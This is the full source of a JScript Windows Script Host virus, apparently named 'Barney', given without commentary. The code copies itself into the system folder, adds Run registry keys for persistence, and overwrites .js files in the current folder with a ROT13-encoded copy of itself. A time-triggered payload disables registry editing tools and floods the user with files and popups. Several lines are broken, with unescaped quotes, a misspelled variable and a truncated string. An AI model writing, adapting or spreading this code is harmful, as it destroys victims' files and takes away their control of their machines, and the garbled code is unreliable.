function Encode(string)
{
output=new String("");
current=new String("");
for(k=0; k<=string.length; k++)
{
current=string.substring(k, k+1);
switch(current)
{
case "a": output+="n";
break;
case "b": output+="o";
break;
case "c": output+="p";
break;
case "d": output+="q";
break;
case "e": output+="r";
break;
case "f": output+="s";
break;
case "g": output+="t";
break;
case "h": output+="u";
break;
case "i": output+="v";
break;
case "j": output+="w";
break;
case "k": output+="x";
break;
case "l": output+="y";
break;
case "m": output+="z";
break;
case "n": output+="a";
break;
case "o": output+="b";
break;
case "p": output+="c";
break;
case "q": output+="d";
break;
case "r": output+="e";
break;
case "s": output+="f";
break;
case "t": output+="g";
break;
case "u": output+="h";
break;
case "v": output+="i";
break;
case "w": output+="j";
break;
case "x": output+="k";
break;
case "y": output+="l";
break;
case "z": output+="m";
break;
case "A": output+="N";
break;
case "B": output+="O";
break;
case "C": output+="P";
break;
case "D": output+="Q";
break;
case "E": output+="R";
break;
case "F": output+="S";
break;
case "G": output+="T";
break;
case "H": output+="U";
break;
case "I": output+="V";
break;
case "J": output+="W";
break;
case "K": output+="X";
break;
case "L": output+="Y";
break;
case "M": output+="Z";
break;
case "N": output+="A";
break;
case "O": output+="B";
break;
case "P": output+="C";
break;
case "Q": output+="D";
break;
case "R": output+="E";
break;
case "S": output+="F";
break;
case "T": output+="G";
break;
case "U": output+="H";
break;
case "V": output+="I";
break;
case "W": output+="J";
break;
case "X": output+="K";
break;
case "Y": output+="L";
break;
case "Z": output+="M";
break;
default : output+=current;
}
}
return output;
}
function ReadVirus(strFileName)
{
var strContents;
strContents = "";
objFSO = new ActiveXObject("Scripting.FileSystemObject");
if (!objFSO.FileExists(strFileName))
{
CopyVirus();
strContents = objFSO.OpenTextFile(strFileName, 1, 0).ReadAll();
return strContents;
}
if (objFSO.FileExists(strFileName))
{
strContents = objFSO.OpenTextFile(strFileName, 1, 0).ReadAll();
return strContents;
}
}
function CopyVirus()
{
fso = new ActiveXObject("Scripting.FileSystemObject");
var shell=new ActiveXObject("WScript.Shell");
virusname = WScript.ScriptFullName;
file = fso.GetFile(virusname);
file.copy(fso.GetSpecialFolder(1)+"\\barney.jse", true);
shell.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\barney","wscript.exe c:\\windows\\system32\\barney.jse");
}
function infectCurrentDir(folder)
{
fso = new ActiveXObject("Scripting.FileSystemObject");
var dec= " var strContents;\r\n"+
" strContents = \""+(((Encode(virus).replace("\\","\\\\")).replace("\"","\\\"")).replace("\r","\\r")).replace("\n","\\n")+"\";\r\n"+
" objFSO = new ActiveXObject(\"Scripting.FileSystemObject\");\r\n"+
" var shell=new ActiveXObject(\"WScript.Shell\");\r\n"+
" Virus = Decode(strContents);\r\n"+
" victim = objFSO.OpenTextFile(\"Imbarney.js\", 2, 0);\r\n"+
" victim.write(virus);\r\n"+
" victom.close();\r\n"+
" shell.run(\"WScript.exe Imbarney.js\");\r\n"+
"function Decode(string)\r\n"+
"{\r\n"+
" \r\n"+
" output=new String(\"\");\r\n"+
" current=new String(\"\");\r\n"+
" for(k=0; k<=string.length; k++)\r\n"+
" {\r\n"+
" current=string.substring(k, k+1);\r\n"+
"\r\n"+
" switch(current)\r\n"+
" {\r\n"+
" case \"n\": output+=\"a\";\r\n"+
" break;\r\n"+
" case \"o\": output+=\"b\";\r\n"+
" break;\r\n"+
" case \"p\": output+=\"c\";\r\n"+
" break;\r\n"+
" case \"q\": output+=\"d\";\r\n"+
" break;\r\n"+
" case \"r\": output+=\"e\";\r\n"+
" break;\r\n"+
" case \"s\": output+=\"f\";\r\n"+
" break;\r\n"+
" case \"t\": output+=\"g\";\r\n"+
" break;\r\n"+
" case \"u\": output+=\"h\";\r\n"+
" break;\r\n"+
" case \"v\": output+=\"i\";\r\n"+
" break;\r\n"+
" case \"w\": output+=\"j\";\r\n"+
" break;\r\n"+
" case \"x\": output+=\"k\";\r\n"+
" break;\r\n"+
" case \"y\": output+=\"l\";\r\n"+
" break;\r\n"+
" case \"z\": output+=\"m\";\r\n"+
" break;\r\n"+
" case \"a\": output+=\"n\";\r\n"+
" break;\r\n"+
" case \"b\": output+=\"o\";\r\n"+
" break;\r\n"+
" case \"c\": output+=\"p\";\r\n"+
" break;\r\n"+
" case \"d\": output+=\"q\";\r\n"+
" break;\r\n"+
" case \"e\": output+=\"r\";\r\n"+
" break;\r\n"+
" case \"f\": output+=\"s\";\r\n"+
" break;\r\n"+
" case \"g\": output+=\"t\";\r\n"+
" break;\r\n"+
" case \"h\": output+=\"u\";\r\n"+
" break;\r\n"+
" case \"i\": output+=\"v\";\r\n"+
" break;\r\n"+
" case \"j\": output+=\"w\";\r\n"+
" break;\r\n"+
" case \"k\": output+=\"x\";\r\n"+
" break;\r\n"+
" case \"l\": output+=\"y\";\r\n"+
" break;\r\n"+
" case "m": output+="z";\r\n"+
" break;\r\n"+
" case \"N\": output+=\"A\";\r\n"+
" break;\r\n"+
" case \"O\": output+=\"B\";\r\n"+
" break;\r\n"+
" case \"C\": output+=\"P\";\r\n"+
" break;\r\n"+
" case \"D\": output+=\"Q\";\r\n"+
" break;\r\n"+
" case "E": output+="R";\r\n"+
" break;\r\n"+
" case "S": output+="F";\r\n"+
" break;\r\n"+
" case \"T\": output+=\"G\";\r\n"+
" break;\r\n"+
" case \"U\": output+=\"H\";\r\n"+
" break;\r\n"+
" case \"V\": output+=\"I\";\r\n"+
" break;\r\n"+
" case \"W\": output+=\"J\";\r\n"+
" break;\r\n"+
" case "X": output+="K";\r\n"+
" break;\r\n"+
" case \"Y\": output+=\"L\";\r\n"+
" break;\r\n"+
" case "Z": output+="M";\r\n"+
" break;\r\n"+
" case \"A\": output+=\"N\";\r\n"+
" break;\r\n"+
" case \"B\": output+=\"O\";\r\n"+
" break;\r\n"+
" case \"P\": output+=\"C\";\r\n"+
" break;\r\n"+
" case \"Q\": output+=\"D\";\r\n"+
" break;\r\n"+
" case \"R\": output+=\"E\";\r\n"+
" break;\r\n"+
" case \"S\": output+=\"F\";\r\n"+
" break;\r\n"+
" case \"G\": output+=\"T\";\r\n"+
" break;\r\n"+
" case \"H\": output+=\"U\";\r\n"+
" break;\r\n"+
" case \"I\": output+=\"V\";\r\n"+
" break;\r\n"+
" case \"J\": output+=\"W\";\r\n"+
" break;\r\n"+
" case \"K\": output+=\"X\";\r\n"+
" break;\r\n"+
" case \"L\": output+=\"Y\";\r\n"+
" break;\r\n"+
" case \"M\": output+=\"Z\";\r\n"+
" break;\r\n"+
" default : output+=current;\r\n"+
" }\r\n"+
" }\r\n";
" return output;\r\n"+
"}";
var f = fso.GetFolder(folder);
var fc = new Enumerator(f.files);
for (; !fc.atEnd(); fc.moveNext())
{
var fileName=fc.item().Name
if(-1!=fileName.search(".js"))
{
if(fileName!="barney.jse")
{
var virus = ReadVirus(fso.GetSpecialFolder(1)+"\\barney.jse");
victim = fso.OpenTextFile(fileName, 2,0);
victim.write(dec);
victim.close();
}
}
}
}
var shell=new ActiveXObject("WScript.Shell");
var virus = ReadVirus(fso.GetSpecialFolder(1)+"\\barney.jse");
infectCurrentDir(".");
var thisdate = new Date();
if(thisdate.getHours()==7)
{
payload();
}
function payload(){
var payload_filename = "explorer.js";
var payload_file = "var txtName = \"You_Have_Been_Infected_By_Barney.txt\";\r\n"+
"var ascii = \r\n"+
"\"\\r\\n\"+\r\n"+
"\" You have been infected by Barney - written by Mr`Anderson & Synge from:\\r\\n\"+\r\n"+
"\"\\r\\n\"+\r\n"+
"\" ###### \\r\\n\"+\r\n"+
"\" # # #### #### # # ##### # ##### ###### ##### ###### \\r\\n\"+\r\n"+
"\" # # # # # # ## ## # # # # # # # # # \\r\\n\"+\r\n"+
"\" # # # # # # # ## # # # # # # ##### # # # \\r\\n\"+\r\n"+
"\" # # # # # # # # ##### # # # # ##### # \\r\\n\"+\r\n"+
"\" # # # # # # # # # # # # # # # # # \\r\\n\"+\r\n"+
"\" ###### #### #### # # # # # ##### ###### # # ###### \";\r\n"+
"try{\r\n"+
"var fso=new ActiveXObject(\"Scripting.FileSystemObject\");\r\n"+
"var shell=new ActiveXObject(\"WScript.Shell\");\r\n"+
"while(true){\r\n"+
"var f=fso.CreateTextFile(txtName);\r\n"+
"f.Write(ascii);\r\n"+
"f.Close();\r\n"+
"shell.Run(txtName,3,true);\r\n"+
"shell.PopUp(\"I love your computer, your computer loves me, we are a happy family.\",1,\"asd\",48);\r\n"+
"}\r\n"+
"}catch(e){}\r\n";
var fso=new ActiveXObject("Scripting.FileSystemObject");
var f=fso.CreateTextFile(payload_filename);
f.Write(payload_file);
f.Close();
var shell=new ActiveXObject("WScript.Shell");
var parentfolder = fso.GetFile(WScript.ScriptFullName).ParentFolder;
var runcmd = "\""+WScript.FullName+"\" \""+parentfolder+"\\"+payload_filename+"\"";
shell.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Shell",runcmd);
shell.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools",1,"REG_DWORD");
shell.Run(runcmd,0,false);
}